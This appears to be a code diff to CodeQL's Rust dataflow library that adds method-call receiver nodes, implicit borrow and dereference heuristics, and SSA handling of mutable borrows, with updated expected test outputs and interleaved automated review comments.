@@ -367,13 +370,41 @@ module Node { private CallExprBaseCfgNode call_; private RustDataFlow::ArgumentPosition pos_; - ExprArgumentNode() { isArgumentForCall(n, call_, pos_) } + ExprArgumentNode() { + isArgumentForCall(n, call_, pos_) and + // For receivers in method calls the `ReceiverNode` is the argument. + not call_.(MethodCallExprCfgNode).getReceiver() = n + } override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { call.asCallBaseExprCfgNode() = call_ and pos = pos_ } } + /** + * The receiver of a method call _after_ any implicit borrow or dereferences + * has taken place. + */ + final class ReceiverNode extends ArgumentNode, TReceiverNode { + private MethodCallExprCfgNode n; + + ReceiverNode() { this = TReceiverNode(n, false) } + + ExprCfgNode getReceiver() { result = n.getReceiver() } + + MethodCallExprCfgNode getMethodCall() { result = n } + + override predicate isArgumentOf(DataFlowCall call, RustDataFlow::ArgumentPosition pos) { + call.asMethodCallExprCfgNode() = n and pos = TSelfParameterPosition() + } + + override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } + + override Location getLocation() { result = n.getLocation() } + + override string toString() { result = "receiver for " + this.getReceiver() } + } + final class SummaryArgumentNode extends FlowSummaryNode, ArgumentNode { private FlowSummaryImpl::Private::SummaryNode receiver; private RustDataFlow::ArgumentPosition pos_; 
@@ -519,6 +550,18 @@ module Node { override Location getLocation() { result = n.getLocation() } } + final class ReceiverPostUpdateNode extends PostUpdateNode, TReceiverNode { + private MethodCallExprCfgNode n; + + ReceiverPostUpdateNode() { this = TReceiverNode(n, true) } + + override Node getPreUpdateNode() { result = TReceiverNode(n, false) } + + override CfgScope getCfgScope() { result = n.getAstNode().getEnclosingCfgScope() } + + override Location getLocation() { result = n.getLocation() } + } + final class SummaryPostUpdateNode extends FlowSummaryNode, PostUpdateNode { private FlowSummaryNode pre; @@ -648,6 +691,14 @@ module LocalFlow { ) or nodeFrom.asPat().(OrPatCfgNode).getAPat() = nodeTo.asPat() + or + // Simple value step from receiver expression to receiver node, in case + // there is no implicit deref or borrow operation. + nodeFrom.asExpr() = nodeTo.(Node::ReceiverNode).getReceiver() + or + // The dual step of the above, for the post-update nodes. + nodeFrom.(Node::PostUpdateNode).getPreUpdateNode().(Node::ReceiverNode).getReceiver() = + nodeTo.(Node::PostUpdateNode).getPreUpdateNode().asExpr() } } 
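Review bot: In the `@@ -648,6 +691,14 @@` hunk, the comment says the new value step from the receiver expression to the `ReceiverNode` applies "in case there is no implicit deref or borrow operation", but the disjunct `nodeFrom.asExpr() = nodeTo.(Node::ReceiverNode).getReceiver()` has no such guard. As written, a receiver for which `implicitBorrow` or `implicitDeref` holds appears to get this plain value step as well as the `ReferenceContent` store or read step added later in this commit. If the unguarded step is an intentional fallback for the heuristics, the comment should say so. Otherwise restrict the step with `not implicitBorrow(mc) and not implicitDeref(mc)` for the node's method call, and apply the same restriction to the dual post-update step. The enclosing predicate starts outside the hunk.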
@@ -998,6 +1049,23 @@ predicate lambdaCallExpr(CallExprCfgNode call, LambdaCallKind kind, ExprCfgNode exists(kind) } +/** Holds if `mc` implicitly borrows its receiver. */ +predicate implicitBorrow(MethodCallExpr mc) { + // Determining whether an implicit borrow happens depends on the type of the + // receiever as well as the target. As a heuristic we simply check if the + // target takes `self` as a borrow and limit the approximation to cases where + // the receiver is a simple variable. + mc.getReceiver() instanceof VariableAccess and + mc.getStaticTarget().getParamList().getSelfParam().isRef() +} + +/** Holds if `mc` implicitly dereferences its receiver. */ +predicate implicitDeref(MethodCallExpr mc) { + // Similarly to `implicitBorrow` this is an approximation. + mc.getReceiver() instanceof VariableAccess and + not mc.getStaticTarget().getParamList().getSelfParam().isRef() +} + // Defines a set of aliases needed for the `RustDataFlow` module private module Aliases { class DataFlowCallableAlias = DataFlowCallable; @@ -1054,13 +1122,12 @@ module RustDataFlow implements InputSig { DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { - node instanceof Node::SsaNode - or - node.(Node::FlowSummaryNode).getSummaryNode().isHidden() - or - node instanceof Node::CaptureNode - or - node instanceof Node::ClosureParameterNode + node instanceof Node::SsaNode or + node.(Node::FlowSummaryNode).getSummaryNode().isHidden() or + node instanceof Node::CaptureNode or + node instanceof Node::ClosureParameterNode or + node instanceof Node::ReceiverNode or + node instanceof Node::ReceiverPostUpdateNode } predicate neverSkipInPathGraph(Node node) { 
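Review bot: `implicitDeref` also holds when the call has no resolved target at all, because its second conjunct is a bare negation: `not mc.getStaticTarget().getParamList().getSelfParam().isRef()`. That negation is satisfied whenever `getStaticTarget()` has no result or the target has no `self` parameter, so every unresolved method call on a variable would be treated as dereferencing its receiver. Binding the parameter first avoids that: `exists(SelfParam self | self = mc.getStaticTarget().getParamList().getSelfParam() | not self.isRef())`. If the wider behaviour is wanted as part of the approximation, the comment should state it explicitly.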
@@ -1169,6 +1236,28 @@ module RustDataFlow implements InputSig { node2.(Node::FlowSummaryNode).getSummaryNode()) } + pragma[nomagic] + private predicate implicitDerefToReceiver(Node node1, Node::ReceiverNode node2, ReferenceContent c) { + node1.asExpr() = node2.getReceiver() and + implicitDeref(node2.getMethodCall().getMethodCallExpr()) and + exists(c) + } + + pragma[nomagic] + private predicate implicitBorrowToReceiver( + Node node1, Node::ReceiverNode node2, ReferenceContent c + ) { + node1.asExpr() = node2.getReceiver() and + implicitBorrow(node2.getMethodCall().getMethodCallExpr()) and + exists(c) + } + + pragma[nomagic] + private predicate referenceExprToExpr(Node node1, Node node2, ReferenceContent c) { + node1.asExpr() = node2.asExpr().(RefExprCfgNode).getExpr() and + exists(c) + } + /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, * `node1` references an object with a content `c.getAReadContent()` whose @@ -1251,6 +1340,17 @@ module RustDataFlow implements InputSig { node2.asExpr() = await ) or + referenceExprToExpr(node2.(PostUpdateNode).getPreUpdateNode(), + node1.(PostUpdateNode).getPreUpdateNode(), c) + or + // Step from receiver expression to receiver node, in case of an implicit + // dereference. + implicitDerefToReceiver(node1, node2, c) + or + // A read step dual to the store step for implicit borrows. + implicitBorrowToReceiver(node2.(PostUpdateNode).getPreUpdateNode(), + node1.(PostUpdateNode).getPreUpdateNode(), c) + or VariableCapture::readStep(node1, c, node2) ) or @@ -1327,11 +1427,7 @@ module RustDataFlow implements InputSig { node2.(PostUpdateNode).getPreUpdateNode().asExpr() = index.getBase() ) or - exists(RefExprCfgNode ref | - c instanceof ReferenceContent and - node1.asExpr() = ref.getExpr() and - node2.asExpr() = ref - ) + referenceExprToExpr(node1, node2, c) or // Store in function argument exists(DataFlowCall call, int i | 
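Review bot: The three new helper predicates `implicitDerefToReceiver`, `implicitBorrowToReceiver` and `referenceExprToExpr` have no QLDoc, and each is used in both the forward and the post-update direction in `readStep` and `storeStep`. In the `@@ -1251,6 +1340,17 @@` hunk the `referenceExprToExpr(node2.(PostUpdateNode).getPreUpdateNode(), node1.(PostUpdateNode).getPreUpdateNode(), c)` disjunct is the only new one without an explanatory comment. Suggest one-line docs such as `/** Holds if node2 is the reference expression &e (or &mut e) whose operand is node1. */` on `referenceExprToExpr`, and `// A read step dual to the store step for reference expressions.` above that disjunct. The trailing `exists(c)` in each helper would also benefit from a note that it only binds `c` to any `ReferenceContent`.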
@@ -1341,6 +1437,10 @@ module RustDataFlow implements InputSig { ) or VariableCapture::storeStep(node1, c, node2) + or + // Step from receiver expression to receiver node, in case of an implicit + // borrow. + implicitBorrowToReceiver(node1, node2, c) } /** @@ -1612,9 +1712,16 @@ private module Cached { TPatNode(PatCfgNode p) or TNameNode(NameCfgNode n) { n.getName() = any(Variable v).getName() } or TExprPostUpdateNode(ExprCfgNode e) { - isArgumentForCall(e, _, _) or - lambdaCallExpr(_, _, e) or - lambdaCreationExpr(e.getExpr(), _) or + isArgumentForCall(e, _, _) + or + lambdaCallExpr(_, _, e) + or + lambdaCreationExpr(e.getExpr(), _) + or + // Whenever `&mut e` has a post-update node we also create one for `e`. + // E.g., for `e` in `f(..., &mut e, ...)` or `*(&mut e) = ...`. + e = any(RefExprCfgNode ref | ref.isMut() and exists(TExprPostUpdateNode(ref))).getExpr() + or e = [ any(IndexExprCfgNode i).getBase(), any(FieldExprCfgNode access).getExpr(), @@ -1623,6 +1730,7 @@ private module Cached { any(AwaitExprCfgNode a).getExpr() ] } or + TReceiverNode(MethodCallExprCfgNode mc, Boolean isPost) or TSsaNode(SsaImpl::DataFlowIntegration::SsaNode node) or TFlowSummaryNode(FlowSummaryImpl::Private::SummaryNode sn) or TClosureSelfReferenceNode(CfgScope c) { lambdaCreationExpr(c, _) } or diff --git a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll index 430049a5006d..36f9545f4e17 100644 --- a/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll +++ b/rust/ql/lib/codeql/rust/dataflow/internal/SsaImpl.qll 
@@ -54,19 +54,7 @@ module SsaInput implements SsaImplCommon::InputSig { * those that are not borrowed (either explicitly using `& mut`, or * (potentially) implicit as borrowed receivers in a method call). */ - class SourceVariable extends Variable { - SourceVariable() { - this.isMutable() - implies - not exists(VariableAccess va | va = this.getAnAccess() | - va = any(RefExpr re | re.isMut()).getExpr() - or - // receivers can be borrowed implicitly, cf. - // https://doc.rust-lang.org/reference/expressions/method-call-expr.html - va = any(MethodCallExpr mce).getReceiver() - ) - } - } + class SourceVariable = Variable; predicate variableWrite(BasicBlock bb, int i, SourceVariable v, boolean certain) { ( @@ -76,7 +64,12 @@ module SsaInput implements SsaImplCommon::InputSig { ) and certain = true or - capturedCallWrite(_, bb, i, v) and certain = false + ( + capturedCallWrite(_, bb, i, v) + or + mutablyBorrows(bb.getNode(i).getAstNode(), v) + ) and + certain = false } predicate variableRead(BasicBlock bb, int i, SourceVariable v, boolean certain) { @@ -229,6 +222,14 @@ predicate capturedCallWrite(Expr call, BasicBlock bb, int i, Variable v) { ) } +/** Holds if `v` may be mutably borrowed in `e`. */ +private predicate mutablyBorrows(Expr e, Variable v) { + e = any(MethodCallExpr mc).getReceiver() and + e.(VariableAccess).getVariable() = v + or + exists(RefExpr re | re = e and re.isMut() and re.getExpr().(VariableAccess).getVariable() = v) +} + /** * Holds if a pseudo read of captured variable `v` should be inserted * at index `i` in exit block `bb`. 
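Review bot: The doc comment kept above `class SourceVariable = Variable;` is now stale. It still says that mutable variables are restricted to "those that are not borrowed (either explicitly using `& mut`, or (potentially) implicit as borrowed receivers in a method call)", which is the restriction this hunk removes. The comment should be rewritten to describe the new model, for example `/** A variable amenable to SSA construction. Mutable borrows are modelled as uncertain writes, see variableWrite. */`. The comment starts outside the hunk, so its opening lines should be checked as well.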
@@ -379,6 +380,12 @@ private module DataFlowIntegrationInput implements Impl::DataFlowIntegrationInpu none() // handled in `DataFlowImpl.qll` instead } + predicate allowFlowIntoUncertainDef(UncertainWriteDefinition def) { + exists(Variable v, BasicBlock bb, int i | + def.definesAt(v, bb, i) and mutablyBorrows(bb.getNode(i).getAstNode(), v) + ) + } + class Parameter = CfgNodes::ParamBaseCfgNode; /** Holds if SSA definition `def` initializes parameter `p` at function entry. */ diff --git a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected index aa484de0a672..c799f45a8e7d 100644 --- a/rust/ql/test/library-tests/dataflow/global/inline-flow.expected +++ b/rust/ql/test/library-tests/dataflow/global/inline-flow.expected 
@@ -27,30 +27,30 @@ edges | main.rs:55:13:55:27 | pass_through(...) | main.rs:55:9:55:9 | b | provenance | | | main.rs:55:26:55:26 | a | main.rs:51:21:51:26 | ...: i64 | provenance | | | main.rs:55:26:55:26 | a | main.rs:55:13:55:27 | pass_through(...) | provenance | | -| main.rs:67:23:67:28 | ...: i64 | main.rs:68:14:68:14 | n | provenance | | -| main.rs:71:31:77:5 | { ... } | main.rs:90:13:90:25 | mn.get_data(...) | provenance | | -| main.rs:75:13:75:21 | source(...) | main.rs:71:31:77:5 | { ... } | provenance | | -| main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | provenance | | +| main.rs:67:22:67:27 | ...: i64 | main.rs:68:14:68:14 | n | provenance | | +| main.rs:71:30:77:5 | { ... } | main.rs:90:13:90:25 | mn.get_data(...) | provenance | | +| main.rs:75:13:75:21 | source(...) | main.rs:71:30:77:5 | { ... } | provenance | | +| main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | provenance | | | main.rs:90:9:90:9 | a | main.rs:91:10:91:10 | a | provenance | | | main.rs:90:13:90:25 | mn.get_data(...) | main.rs:90:9:90:9 | a | provenance | | | main.rs:96:9:96:9 | a | main.rs:97:16:97:16 | a | provenance | | | main.rs:96:13:96:21 | source(...) | main.rs:96:9:96:9 | a | provenance | | -| main.rs:97:16:97:16 | a | main.rs:67:23:67:28 | ...: i64 | provenance | | +| main.rs:97:16:97:16 | a | main.rs:67:22:67:27 | ...: i64 | provenance | | | main.rs:102:9:102:9 | a | main.rs:103:29:103:29 | a | provenance | | | main.rs:102:13:102:21 | source(...) | main.rs:102:9:102:9 | a | provenance | | | main.rs:103:9:103:9 | b | main.rs:104:10:104:10 | b | provenance | | | main.rs:103:13:103:30 | mn.data_through(...) | main.rs:103:9:103:9 | b | provenance | | -| main.rs:103:29:103:29 | a | main.rs:79:28:79:33 | ...: i64 | provenance | | +| main.rs:103:29:103:29 | a | main.rs:79:27:79:32 | ...: i64 | provenance | | | main.rs:103:29:103:29 | a | main.rs:103:13:103:30 | mn.data_through(...) 
| provenance | | -| main.rs:109:9:109:9 | a | main.rs:110:26:110:26 | a | provenance | | +| main.rs:109:9:109:9 | a | main.rs:110:25:110:25 | a | provenance | | | main.rs:109:13:109:21 | source(...) | main.rs:109:9:109:9 | a | provenance | | -| main.rs:110:26:110:26 | a | main.rs:67:23:67:28 | ...: i64 | provenance | | -| main.rs:115:9:115:9 | a | main.rs:116:39:116:39 | a | provenance | | +| main.rs:110:25:110:25 | a | main.rs:67:22:67:27 | ...: i64 | provenance | | +| main.rs:115:9:115:9 | a | main.rs:116:38:116:38 | a | provenance | | | main.rs:115:13:115:22 | source(...) | main.rs:115:9:115:9 | a | provenance | | | main.rs:116:9:116:9 | b | main.rs:117:10:117:10 | b | provenance | | -| main.rs:116:13:116:40 | ...::data_through(...) | main.rs:116:9:116:9 | b | provenance | | -| main.rs:116:39:116:39 | a | main.rs:79:28:79:33 | ...: i64 | provenance | | -| main.rs:116:39:116:39 | a | main.rs:116:13:116:40 | ...::data_through(...) | provenance | | +| main.rs:116:13:116:39 | ...::data_through(...) | main.rs:116:9:116:9 | b | provenance | | +| main.rs:116:38:116:38 | a | main.rs:79:27:79:32 | ...: i64 | provenance | | +| main.rs:116:38:116:38 | a | main.rs:116:13:116:39 | ...::data_through(...) | provenance | | | main.rs:128:12:128:17 | ...: i64 | main.rs:129:24:129:24 | n | provenance | | | main.rs:129:9:129:26 | MyInt {...} [MyInt] | main.rs:128:28:130:5 | { ... } [MyInt] | provenance | | | main.rs:129:24:129:24 | n | main.rs:129:9:129:26 | MyInt {...} [MyInt] | provenance | | 
@@ -82,13 +82,6 @@ edges | main.rs:202:13:202:21 | source(...) | main.rs:202:9:202:9 | a | provenance | | | main.rs:212:13:212:13 | c | main.rs:213:14:213:14 | c | provenance | | | main.rs:212:17:212:25 | source(...) | main.rs:212:13:212:13 | c | provenance | | -| main.rs:228:25:228:30 | ...: i64 | main.rs:229:10:229:10 | c | provenance | | -| main.rs:229:6:229:6 | [post] n [&ref] | main.rs:228:12:228:22 | ...: ... [Return] [&ref] | provenance | | -| main.rs:229:10:229:10 | c | main.rs:229:6:229:6 | [post] n [&ref] | provenance | | -| main.rs:237:13:237:13 | [post] m [&ref] | main.rs:238:11:238:11 | m [&ref] | provenance | | -| main.rs:237:16:237:25 | source(...) | main.rs:228:25:228:30 | ...: i64 | provenance | | -| main.rs:237:16:237:25 | source(...) | main.rs:237:13:237:13 | [post] m [&ref] | provenance | | -| main.rs:238:11:238:11 | m [&ref] | main.rs:238:10:238:11 | * ... | provenance | | nodes | main.rs:12:28:14:1 | { ... } | semmle.label | { ... } | | main.rs:13:5:13:13 | source(...) | semmle.label | source(...) | 
@@ -121,12 +114,12 @@ nodes | main.rs:55:13:55:27 | pass_through(...) | semmle.label | pass_through(...) | | main.rs:55:26:55:26 | a | semmle.label | a | | main.rs:56:10:56:10 | b | semmle.label | b | -| main.rs:67:23:67:28 | ...: i64 | semmle.label | ...: i64 | +| main.rs:67:22:67:27 | ...: i64 | semmle.label | ...: i64 | | main.rs:68:14:68:14 | n | semmle.label | n | -| main.rs:71:31:77:5 | { ... } | semmle.label | { ... } | +| main.rs:71:30:77:5 | { ... } | semmle.label | { ... } | | main.rs:75:13:75:21 | source(...) | semmle.label | source(...) | -| main.rs:79:28:79:33 | ...: i64 | semmle.label | ...: i64 | -| main.rs:79:43:85:5 | { ... } | semmle.label | { ... } | +| main.rs:79:27:79:32 | ...: i64 | semmle.label | ...: i64 | +| main.rs:79:42:85:5 | { ... } | semmle.label | { ... } | | main.rs:90:9:90:9 | a | semmle.label | a | | main.rs:90:13:90:25 | mn.get_data(...) | semmle.label | mn.get_data(...) | | main.rs:91:10:91:10 | a | semmle.label | a | @@ -141,12 +134,12 @@ nodes | main.rs:104:10:104:10 | b | semmle.label | b | | main.rs:109:9:109:9 | a | semmle.label | a | | main.rs:109:13:109:21 | source(...) | semmle.label | source(...) | -| main.rs:110:26:110:26 | a | semmle.label | a | +| main.rs:110:25:110:25 | a | semmle.label | a | | main.rs:115:9:115:9 | a | semmle.label | a | | main.rs:115:13:115:22 | source(...) | semmle.label | source(...) | | main.rs:116:9:116:9 | b | semmle.label | b | -| main.rs:116:13:116:40 | ...::data_through(...) | semmle.label | ...::data_through(...) | -| main.rs:116:39:116:39 | a | semmle.label | a | +| main.rs:116:13:116:39 | ...::data_through(...) | semmle.label | ...::data_through(...) | +| main.rs:116:38:116:38 | a | semmle.label | a | | main.rs:117:10:117:10 | b | semmle.label | b | | main.rs:128:12:128:17 | ...: i64 | semmle.label | ...: i64 | | main.rs:128:28:130:5 | { ... } [MyInt] | semmle.label | { ... } [MyInt] | 
@@ -184,24 +177,15 @@ nodes | main.rs:212:13:212:13 | c | semmle.label | c | | main.rs:212:17:212:25 | source(...) | semmle.label | source(...) | | main.rs:213:14:213:14 | c | semmle.label | c | -| main.rs:228:12:228:22 | ...: ... [Return] [&ref] | semmle.label | ...: ... [Return] [&ref] | -| main.rs:228:25:228:30 | ...: i64 | semmle.label | ...: i64 | -| main.rs:229:6:229:6 | [post] n [&ref] | semmle.label | [post] n [&ref] | -| main.rs:229:10:229:10 | c | semmle.label | c | -| main.rs:237:13:237:13 | [post] m [&ref] | semmle.label | [post] m [&ref] | -| main.rs:237:16:237:25 | source(...) | semmle.label | source(...) | -| main.rs:238:10:238:11 | * ... | semmle.label | * ... | -| main.rs:238:11:238:11 | m [&ref] | semmle.label | m [&ref] | subpaths | main.rs:36:26:36:26 | a | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:36:13:36:27 | pass_through(...) | | main.rs:41:26:44:5 | { ... } | main.rs:30:17:30:22 | ...: i64 | main.rs:30:32:32:1 | { ... } | main.rs:41:13:44:6 | pass_through(...) | | main.rs:55:26:55:26 | a | main.rs:51:21:51:26 | ...: i64 | main.rs:51:36:53:5 | { ... } | main.rs:55:13:55:27 | pass_through(...) | -| main.rs:103:29:103:29 | a | main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | main.rs:103:13:103:30 | mn.data_through(...) | -| main.rs:116:39:116:39 | a | main.rs:79:28:79:33 | ...: i64 | main.rs:79:43:85:5 | { ... } | main.rs:116:13:116:40 | ...::data_through(...) | +| main.rs:103:29:103:29 | a | main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | main.rs:103:13:103:30 | mn.data_through(...) | +| main.rs:116:38:116:38 | a | main.rs:79:27:79:32 | ...: i64 | main.rs:79:42:85:5 | { ... } | main.rs:116:13:116:39 | ...::data_through(...) | | main.rs:134:24:134:33 | source(...) | main.rs:128:12:128:17 | ...: i64 | main.rs:128:28:130:5 | { ... } [MyInt] | main.rs:134:13:134:34 | ...::new(...) 
[MyInt] | | main.rs:187:49:187:49 | a [MyInt] | main.rs:175:18:175:21 | SelfParam [MyInt] | main.rs:175:48:177:5 | { ... } [MyInt] | main.rs:187:30:187:53 | ...::take_self(...) [MyInt] | | main.rs:192:54:192:54 | b [MyInt] | main.rs:179:26:179:37 | ...: MyInt [MyInt] | main.rs:179:49:181:5 | { ... } [MyInt] | main.rs:192:30:192:55 | ...::take_second(...) [MyInt] | -| main.rs:237:16:237:25 | source(...) | main.rs:228:25:228:30 | ...: i64 | main.rs:228:12:228:22 | ...: ... [Return] [&ref] | main.rs:237:13:237:13 | [post] m [&ref] | testFailures #select | main.rs:18:10:18:10 | a | main.rs:13:5:13:13 | source(...) | main.rs:18:10:18:10 | a | $@ | main.rs:13:5:13:13 | source(...) | source(...) | @@ -219,4 +203,3 @@ testFailures | main.rs:193:10:193:10 | c | main.rs:191:28:191:37 | source(...) | main.rs:193:10:193:10 | c | $@ | main.rs:191:28:191:37 | source(...) | source(...) | | main.rs:203:10:203:10 | a | main.rs:202:13:202:21 | source(...) | main.rs:203:10:203:10 | a | $@ | main.rs:202:13:202:21 | source(...) | source(...) | | main.rs:213:14:213:14 | c | main.rs:212:17:212:25 | source(...) | main.rs:213:14:213:14 | c | $@ | main.rs:212:17:212:25 | source(...) | source(...) | -| main.rs:238:10:238:11 | * ... | main.rs:237:16:237:25 | source(...) | main.rs:238:10:238:11 | * ... | $@ | main.rs:237:16:237:25 | source(...) | source(...) | diff --git a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected index ad83682d7d06..776300d8943e 100644 --- a/rust/ql/test/library-tests/dataflow/global/viableCallable.expected +++ b/rust/ql/test/library-tests/dataflow/global/viableCallable.expected 
@@ -23,9 +23,9 @@ | main.rs:103:13:103:30 | mn.data_through(...) | main.rs:79:5:85:5 | fn data_through | | main.rs:104:5:104:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:109:13:109:21 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:110:5:110:27 | ...::data_in(...) | main.rs:67:5:69:5 | fn data_in | +| main.rs:110:5:110:26 | ...::data_in(...) | main.rs:67:5:69:5 | fn data_in | | main.rs:115:13:115:22 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:116:13:116:40 | ...::data_through(...) | main.rs:79:5:85:5 | fn data_through | +| main.rs:116:13:116:39 | ...::data_through(...) | main.rs:79:5:85:5 | fn data_through | | main.rs:117:5:117:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:134:13:134:34 | ...::new(...) | main.rs:127:5:130:5 | fn new | | main.rs:134:24:134:33 | source(...) | main.rs:1:1:3:1 | fn source | 
@@ -56,22 +56,12 @@ | main.rs:220:41:220:54 | async_source(...) | main.rs:201:1:205:1 | fn async_source | | main.rs:221:5:221:11 | sink(...) | main.rs:5:1:7:1 | fn sink | | main.rs:223:33:223:61 | test_async_await_async_part(...) | main.rs:207:1:217:1 | fn test_async_await_async_part | -| main.rs:236:5:236:12 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:237:5:237:26 | set_int(...) | main.rs:228:1:230:1 | fn set_int | -| main.rs:237:16:237:25 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:238:5:238:12 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:244:5:244:11 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:245:5:245:31 | set_int(...) | main.rs:228:1:230:1 | fn set_int | -| main.rs:245:21:245:30 | source(...) | main.rs:1:1:3:1 | fn source | -| main.rs:246:5:246:11 | sink(...) | main.rs:5:1:7:1 | fn sink | -| main.rs:250:5:250:22 | data_out_of_call(...) | main.rs:16:1:19:1 | fn data_out_of_call | -| main.rs:251:5:251:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | -| main.rs:252:5:252:23 | data_through_call(...) | main.rs:34:1:38:1 | fn data_through_call | -| main.rs:253:5:253:34 | data_through_nested_function(...) | main.rs:48:1:57:1 | fn data_through_nested_function | -| main.rs:255:5:255:24 | data_out_of_method(...) | main.rs:88:1:92:1 | fn data_out_of_method | -| main.rs:256:5:256:28 | data_in_to_method_call(...) | main.rs:94:1:98:1 | fn data_in_to_method_call | -| main.rs:257:5:257:25 | data_through_method(...) | main.rs:100:1:105:1 | fn data_through_method | -| main.rs:259:5:259:31 | test_operator_overloading(...) | main.rs:148:1:164:1 | fn test_operator_overloading | -| main.rs:260:5:260:22 | test_async_await(...) | main.rs:219:1:224:1 | fn test_async_await | -| main.rs:261:5:261:24 | mutates_argument_1(...) | main.rs:232:1:239:1 | fn mutates_argument_1 | -| main.rs:262:5:262:24 | mutates_argument_2(...) | main.rs:241:1:247:1 | fn mutates_argument_2 | +| main.rs:227:5:227:22 | data_out_of_call(...) 
| main.rs:16:1:19:1 | fn data_out_of_call | +| main.rs:228:5:228:21 | data_in_to_call(...) | main.rs:25:1:28:1 | fn data_in_to_call | +| main.rs:229:5:229:23 | data_through_call(...) | main.rs:34:1:38:1 | fn data_through_call | +| main.rs:230:5:230:34 | data_through_nested_function(...) | main.rs:48:1:57:1 | fn data_through_nested_function | +| main.rs:232:5:232:24 | data_out_of_method(...) | main.rs:88:1:92:1 | fn data_out_of_method | +| main.rs:233:5:233:28 | data_in_to_method_call(...) | main.rs:94:1:98:1 | fn data_in_to_method_call | +| main.rs:234:5:234:25 | data_through_method(...) | main.rs:100:1:105:1 | fn data_through_method | +| main.rs:236:5:236:31 | test_operator_overloading(...) | main.rs:148:1:164:1 | fn test_operator_overloading | +| main.rs:237:5:237:22 | test_async_await(...) | main.rs:219:1:224:1 | fn test_async_await | diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index 00b35694976a..be64618edc62 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected 
@@ -277,22 +277,32 @@ localStep | main.rs:240:9:240:10 | s1 | main.rs:240:9:240:10 | [SSA] s1 | | main.rs:240:9:240:10 | s1 | main.rs:240:9:240:10 | s1 | | main.rs:240:14:240:29 | Some(...) | main.rs:240:9:240:10 | s1 | +| main.rs:241:10:241:11 | s1 | main.rs:241:10:241:20 | receiver for s1 | +| main.rs:241:10:241:20 | [post] receiver for s1 | main.rs:241:10:241:11 | [post] s1 | | main.rs:245:9:245:10 | [SSA] s1 | main.rs:246:10:246:11 | s1 | | main.rs:245:9:245:10 | s1 | main.rs:245:9:245:10 | [SSA] s1 | | main.rs:245:9:245:10 | s1 | main.rs:245:9:245:10 | s1 | | main.rs:245:14:245:29 | Some(...) | main.rs:245:9:245:10 | s1 | +| main.rs:246:10:246:11 | s1 | main.rs:246:10:246:24 | receiver for s1 | +| main.rs:246:10:246:24 | [post] receiver for s1 | main.rs:246:10:246:11 | [post] s1 | | main.rs:248:9:248:10 | [SSA] s2 | main.rs:249:10:249:11 | s2 | | main.rs:248:9:248:10 | s2 | main.rs:248:9:248:10 | [SSA] s2 | | main.rs:248:9:248:10 | s2 | main.rs:248:9:248:10 | s2 | | main.rs:248:14:248:20 | Some(...) | main.rs:248:9:248:10 | s2 | +| main.rs:249:10:249:11 | s2 | main.rs:249:10:249:33 | receiver for s2 | +| main.rs:249:10:249:33 | [post] receiver for s2 | main.rs:249:10:249:11 | [post] s2 | | main.rs:253:9:253:10 | [SSA] s1 | main.rs:254:10:254:11 | s1 | | main.rs:253:9:253:10 | s1 | main.rs:253:9:253:10 | [SSA] s1 | | main.rs:253:9:253:10 | s1 | main.rs:253:9:253:10 | s1 | | main.rs:253:14:253:29 | Some(...) 
| main.rs:253:9:253:10 | s1 | +| main.rs:254:10:254:11 | s1 | main.rs:254:10:254:32 | receiver for s1 | +| main.rs:254:10:254:32 | [post] receiver for s1 | main.rs:254:10:254:11 | [post] s1 | | main.rs:256:9:256:10 | [SSA] s2 | main.rs:257:10:257:11 | s2 | | main.rs:256:9:256:10 | s2 | main.rs:256:9:256:10 | [SSA] s2 | | main.rs:256:9:256:10 | s2 | main.rs:256:9:256:10 | s2 | | main.rs:256:14:256:17 | None | main.rs:256:9:256:10 | s2 | +| main.rs:257:10:257:11 | s2 | main.rs:257:10:257:41 | receiver for s2 | +| main.rs:257:10:257:41 | [post] receiver for s2 | main.rs:257:10:257:11 | [post] s2 | | main.rs:261:9:261:10 | [SSA] s1 | main.rs:263:14:263:15 | s1 | | main.rs:261:9:261:10 | s1 | main.rs:261:9:261:10 | [SSA] s1 | | main.rs:261:9:261:10 | s1 | main.rs:261:9:261:10 | s1 | 
